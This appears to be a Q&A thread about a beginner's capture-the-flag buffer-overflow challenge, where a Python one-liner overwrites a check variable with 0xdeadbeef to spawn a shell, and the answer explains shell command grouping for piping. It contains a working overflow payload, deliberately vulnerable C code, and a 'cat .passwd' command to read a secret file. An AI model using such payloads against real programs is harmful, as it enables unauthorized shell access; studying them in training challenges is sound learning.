# How the standards input passing stream different?

Tags: c, shellcode

I'm a newbie in Linux, and exploitation. I have tried to solve some exploitation challenges and I realize some interesting things.

**[1]**`(python -c 'print "a"*40 + "\xef\xbe\xad\xde"';cat ) | ./ch13`

and

**[2]**`python -c 'print "a"*40 + "\xef\xbe\xad\xde"';cat  | ./ch13`

When I use I [1] my shellcode work correctly, and it don't work with the other. So, What effective did my shellcode take into program? How different between them?

and the last one,
**[3]** `python -c 'print "a"*40 + "\xef\xbe\xad\xde\0" + " -c \"cat .passwd\""'`
I tried passing shellcode `-c "cat .passwd"` as a argv to the program. But I got notthings!

**Note:** This is program code (changed):

```
int check = 0x04030201;
  char buf[40];

  fgets(buf,45,stdin);

  printf("\n[buf]: %s\n", buf);
  printf("[check] %p\n", check);

  if ((check != 0x04030201) && (check != 0xdeadbeef))
    printf ("UUU\n");

  if (check == 0xdeadbeef)
   {
     printf("Opening your shell...\n");
     system("/bin/dash");
   }
```

Thank for reading! Hope to be given documentary..

Comment: Not really related, but you should check `argc` and `argv`if you use them, and `system()` has a return value which you can check too.

Comment: What this `cat` is supposed to do anyway?

Comment: @EugeneSh.: In this case, accept (and print) *user* input until the user provides an EOF. Basically, [1] is "\xef\xbe\xad\xde<user input>" --- and then the whole shebang is piped to `./ch13`.

Comment: @EugeneSh., I would guess that the point is to allow user interaction with the `./ch13` program, after python delivers its bit.

Comment: Don't you think, buffer size and read length should be somehow related? ;) `char buf[40]; fgets(buf,45,stdin);`

Comment: I'd expect `char buf[40];  fgets(buf,sizeof buf,stdin);`

Comment: @Gerhardher It's fully right :D, `fget(buf,45,stdin)` thank to that, we can exploit buferoverflow vulnerable :D

Answer (score 1):

In the second version, the `python` output is not being piped to `./chi13`, it gets printed on the screen. `;` separates commands, so it's equivalent to:

```
python -c 'print "a"*40 + "\xef\xbe\xad\xde"'
cat  | ./ch13
```

You need to group the two commands to get both of them to write to the pipe. You can do that either by putting them together in a subshell with `()`, or using grouping with `{}`:

```
{ python -c 'print "a"*40 + "\xef\xbe\xad\xde"'; cat; } | ./chi13
```